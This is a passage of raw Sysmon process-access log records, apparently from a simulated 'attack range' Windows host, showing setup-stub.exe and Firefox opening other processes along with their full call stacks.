rage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64) 10341000x800000000000000016538Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.021{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016537Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.021{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64) 10341000x800000000000000016536Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.021{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64) 10341000x800000000000000016535Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.021{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64) 10341000x800000000000000016534Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.021{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016533Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.021{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64) 10341000x800000000000000016532Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.021{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64) 10341000x800000000000000016531Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.021{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64) 10341000x800000000000000016530Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.021{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016529Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.021{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64) 10341000x800000000000000016528Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.021{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64) 10341000x800000000000000016527Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.021{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64) 10341000x800000000000000016526Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.021{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016525Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.021{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64) 10341000x800000000000000016524Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.021{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64) 10341000x800000000000000016523Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.021{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64) 10341000x800000000000000016522Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.021{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016521Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.021{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64) 10341000x800000000000000016715Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:56.911{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+1e796c|C:\Program Files\Mozilla Firefox\xul.dll+1e78bc|C:\Program Files\Mozilla Firefox\xul.dll+1010288|C:\Program Files\Mozilla Firefox\xul.dll+106c541|C:\Program Files\Mozilla Firefox\xul.dll+1722fb0|C:\Program Files\Mozilla Firefox\xul.dll+17212f6|C:\Program Files\Mozilla Firefox\xul.dll+17211bf|C:\Program Files\Mozilla Firefox\xul.dll+1722742|C:\Program Files\Mozilla Firefox\xul.dll+2df7bc2|C:\Program Files\Mozilla Firefox\xul.dll+2df693a|C:\Program Files\Mozilla Firefox\xul.dll+2ec95e7|C:\Program Files\Mozilla Firefox\xul.dll+42b911|C:\Program Files\Mozilla Firefox\xul.dll+14e56f6|C:\Program Files\Mozilla Firefox\xul.dll+3016795|C:\Program Files\Mozilla Firefox\xul.dll+30168fa|C:\Program Files\Mozilla Firefox\xul.dll+30168fa|C:\Program 